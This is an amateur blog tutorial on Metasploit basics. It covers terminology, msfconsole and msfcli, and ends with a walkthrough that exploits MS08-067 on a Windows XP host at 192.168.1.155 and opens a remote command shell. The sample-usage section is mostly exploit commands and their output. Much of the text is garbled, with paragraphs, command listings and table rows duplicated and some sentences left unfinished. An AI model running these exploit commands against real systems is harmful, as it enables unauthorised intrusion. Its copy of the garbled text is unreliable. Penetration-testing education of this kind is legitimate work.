METASPLOIT Framework BASICS
METASPLOIT BASICS
Terminology :
Terminology : Throughout this , we’ll use various terms that first bear some explanation.The majority of the following basic terms are defined in the context ofMetasploit, but they are generallythe same throughout the security industry.
Exploit :
An exploit is the means by which an attacker, or pentester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities
(such as SQL injection), and con-figuration errors.
Payload :
A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Win-dows command prompt whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Shellcode :
Shellcode is a set of instructions used as a payload when exploitation occurs.Shellcode is typically written in assembly language. In most cases, a command shell or a Meterpreter shell will be provided after the series of instructions have been performed by the target machine, hence the name.
Module :
A module is a piece of software that can be used by the Metasploit Framework. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times,
an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of whatmakes the Framework so powerful.
Listener :
A listener is a component within Metasploit that waits for an incoming connectionof some sort. For example, after the target machine has been exploited, it maycall the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.
Metasploit Interfaces :
Metasploit offers more than one interface to its underlying functionality,including console, command line, and graphical interfaces. In addition tothese interfaces, utilities provide direct access to functions that are normally internal to the Metasploit Framework. These utilities can be invaluable for exploit development and situations for which you do not need the flexibility of the entire Framework.
Metasploit offers more than one interface to its underlying functionality,including console, command line, and graphical interfaces. In addition tothese interfaces, utilities provide direct access to functions that are normally internal to the Metasploit Framework. These utilities can be invaluable for exploit development and situations for which you do not need the flexibility of the entire Framework.
MSFconsole :
Msfconsole is by far the most popular part of the Metasploit Framework and for good reason. It is one of the most flexible, feature-rich, and well supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framewok it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.
Msfconsole is by far the most popular part of the Metasploit Framework and for good reason. It is one of the most flexible, feature-rich, and well supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framewok it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.
Although the MetasploitFramework is constantly changing,a subset of commands remain relatively constant. By mastering the basics of msfconsole, you will be able to keep up with any changes. To illustrate the importance of learning msfconsole,
Starting MSFconsole :
To launch msfconsole, enter msfconsole at the command line:
root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
To launch msfconsole, enter msfconsole at the command line:
root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
< metasploit >
------------
\
,__,
\ (oo)____
(__) )\
||--|| *
msf >
---------------------------------------------------------
To access msfconsole’s help files, enter help followed by the command
which you are interested in. In the next example, we are looking for help for the command connect , which allows us to communicate with a host. The
resulting documentation lists usage, a description of the tool, and the various option flags.
To access msfconsole’s help files, enter help followed by the command
which you are interested in. In the next example, we are looking for help for the command connect , which allows us to communicate with a host. The
resulting documentation lists usage, a description of the tool, and the various option flags.
msf > help connect
MSFcli :
Msfcli and msfconsole take very different approaches to providing access to theFramework. Where msfconsole provides an interactive way to access all features in a user-friendly manner, msfcli puts the priority on scripting and interpretability with other console-based tools. Instead of providing a unique inter-preter to the Framework, msfcli runs directly from the command line, whichallows you to redirect output from other tools into msfcli and direct msfcli output to other command-line tools. Msfcli also supports the launching of exploits and auxiliary modules, and it can be convenient when testing mod-ules or developing new exploits for the Framework. It is a fantastic tool for unique exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h , as shown here:
Msfcli and msfconsole take very different approaches to providing access to theFramework. Where msfconsole provides an interactive way to access all features in a user-friendly manner, msfcli puts the priority on scripting and interpretability with other console-based tools. Instead of providing a unique inter-preter to the Framework, msfcli runs directly from the command line, whichallows you to redirect output from other tools into msfcli and direct msfcli output to other command-line tools. Msfcli also supports the launching of exploits and auxiliary modules, and it can be convenient when testing mod-ules or developing new exploits for the Framework. It is a fantastic tool for unique exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h , as shown here:
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli
<exploit_name> <option=value> [mode]
==========================
Mode Description
(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
Sample Usage :
Let’s take a look at how you might use msfcli. Don’t worry about the details;these examples are intended to give you a sense of how you might work withthis interface.When you are first learning Metasploit or whenever you get stuck, you can see the options available in a module by appending the letter O to the end of the string at whichever point you are stuck. For example, in the following listing, we use the O to see the options available for the ms08_067_netapi
module:
root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
Name Current Setting Required Description
-------------------
RHOST 0.0.0.0 yes The target address
RHOST 0.0.0.0 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
-----------
-----------
You can see that the module requires three options: RHOST , RPORT , and SMPIPE . Now, by adding a P , we can check for available
payloads:
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...
Compatible payloads
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...
Compatible payloads
===================
----
----
Name Description
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
-----------
Having set all the required options for our exploit and selecting a pay-
load, we can run our exploit by passing the letter E to the end of the msfcli
argument string, as shown here:
load, we can run our exploit by passing the letter E to the end of the msfcli
argument string, as shown here:
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
We’re successful, because we have received a Windows command
prompt from the remote system.
thanks for reading this blog or if you just scrolling to here...😂😂
(suggest me topics to cover ) ( my first Blog Don't gudge)
Comments
Post a Comment